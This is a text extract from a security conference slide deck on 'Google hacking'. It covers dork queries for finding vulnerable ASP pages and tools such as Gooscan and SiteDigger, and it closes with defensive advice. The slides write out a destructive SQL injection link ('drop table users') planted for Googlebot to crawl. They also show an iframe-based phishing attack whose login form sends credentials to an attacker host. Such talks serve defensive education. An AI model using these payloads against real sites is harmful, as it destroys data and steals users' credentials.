Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 49: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/49.jpg)
Tracking Down Web Servers, Log Portals, etc..!
Error Message for XSS/XSRF – inurl:“error.asp?msg=” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 50: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/50.jpg)
Dirty Attacks using Googlebot!
Googlebot, Google’s Web Crawler!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
<a href=http://www.mict.go.th>MICT</a>
![Page 51: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/51.jpg)
Dirty Attacks using Googlebot!Google’s Query Processor!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
![Page 52: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/52.jpg)
Dirty Attacks using Googlebot!Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
SQL Injec-on via Googlebot
We search in Google one of signatures: inurl:”.asp?id=“,inurl:”?name=“,”Microsoft OLE DB Provider for SQL Server”
Finding the link: http://www.hackme.com/cat.asp?ID=1
Create the file test.html the code is: <html> <a href=“http://www.hackme.com/cat.asp?
ID=1+drop+table+’users’—”>Click Here</a> </html>
![Page 53: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/53.jpg)
Dirty Attacks using Googlebot!Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
SQL Injec-on via Googlebot
Then upload to: http://www.mysite.com/test.html After a few days GoogleBot will index the file: http://www.mysite.com/test.html Then index the link “Click Here” inside the file:
http://www.hackme.com/cat.asp?ID=1+drop+table+’users’—
The application SQL query is: SELECT Username FROM users WHERE ID=1
drop table ‘users’— The Result: The table “users” has been deleted,
thanks to Google
![Page 54: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/54.jpg)
Dirty Attacks using Googlebot!Google’s Query Processor!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
<a href=“http://www.hackeme.com/cat.asp?ID=1+drop+table+’users’—”>Click Here</a>
<a href=“http://www.hackeme.com/cat.asp?ID=1+drop+table+’users’—”>Click Here</a>
/cat.asp?ID=1+drop+table+’users’—
![Page 55: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/55.jpg)
Dirty Attacks using Googlebot!Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
Cross Site Framing via Googlebot
We search in Google one of signatures: inurl:”.asp?msg=“,inurl:”.asp?title=“,..
We find the link: http://www.CITEC.com/bank/Login.asp?MsgError=Access
denied Create the file 1.html the code is:
<html> <title>CITEC Bank | Login CITEC | CITEC Account</
title> <a href=“http://www.CITEC.com/bank/Login.asp?
MsgError=<iframe src=‘http://www.social.com/2.html’></iframe>”>CITEC Bank</a>
</html>
![Page 56: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/56.jpg)
Dirty Attacks using Googlebot!Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
Cross Site Framing via Googlebot
And the file 2.html <form method=“post” action=“http://www.social.com/1.php>
Username: <input type=“text” name=“user”><br> Password: <input type=“password” name=“pass”>
<input type=“submit” value=“Send”> </form>
Then upload All The Files to: http://www.social.com/
![Page 57: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/57.jpg)
Dirty Attacks using Googlebot!Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
Cross Site Framing via Googlebot
After a few days GoogleBot will index the file: http://www.social.com/1.html
Then will index the link “CITEC Bank”(that within the file):
http://www.CITEC.com/bank/Login.asp?MsgError=<iframe src=‘http://www.social.com/2.html’></iframe>
![Page 58: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/58.jpg)
Dirty Attacks using Googlebot!Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot Google Hacking Tools
--------------------------------
Cross Site Framing via Googlebot
The users that search “CITEC Bank” will find the above link and when getting inside the link they will see this form:
The Result: Many Users are being Manipulated by the attacker which uses Google in order to execute a Phishing attack (with XSS).
![Page 59: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/59.jpg)
Google Hacking Tools!
Google Hacking Database (GHDB)!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 60: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/60.jpg)
Google Hacking Tools!
Gooscan !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 61: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/61.jpg)
Google Hacking Tools!
SiteDigger Tools !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 62: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/62.jpg)
Google Hacking Tools!
Goolink – This is very handy for finding vulnerable site wide open to google and googlebots!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 63: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/63.jpg)
Google Hacking Tools!
GoolagScanner – Enable to Audit Website via Google!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 64: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/64.jpg)
Spike Bot – (By Me ) !
Google Links with Spike Bot !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 65: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/65.jpg)
How to Protect Google Hacking!
Keep sensitive data off the web Use common sense!! Basic security practices is all it
takes. Defense in depth, act diligently when configuring web based devices and have a strong corporate security policy
Use Google hacking techniques to uncover your own security problems. So…..Google hack yourself!
Perform periodic Google Assessments – Update robots.txt – Use meta-tags: NOARCHIVE – http://www.google.com/remove.html
Work with Google for help in removing security breaches. They are easy to work with and want to help! You can find contact info on their site
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 66: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/66.jpg)
If someone is still in the room.. Q & A!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
THANK YOU